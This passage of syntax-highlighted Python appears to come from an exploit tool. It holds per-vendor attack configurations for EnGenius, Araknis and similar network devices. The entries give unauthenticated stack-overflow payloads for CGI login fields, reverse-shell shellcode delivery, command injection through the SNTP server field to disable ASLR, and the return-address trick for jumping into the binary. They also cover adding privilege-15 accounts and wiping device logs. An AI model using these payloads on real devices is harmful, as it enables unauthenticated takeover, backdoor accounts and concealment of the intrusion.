						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'EnGenius'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'EnGenius Technologies, Inc.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/loginMsg.js'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'security.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">280</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'datajson.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn_httpupload.cgi?'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># &lt;================================</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># It is vulnerable, but I am not using this authenticated code here :&gt;</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token comment"># Bonus: Disable and clean logs</span>
					<span class="token comment">#</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;en=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=0'</span><span class="token punctuation">,</span>					<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=1'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sp=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check`&amp;sp=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=+&amp;sp=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># Used for both 'heap' and 'stack'</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'build=NOP&amp;heap=NOP&amp;to=NOP&amp;higher=addresses&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token comment">#'stack':False, # False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Araknis'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Araknis Networks'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/loginMsg.js'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
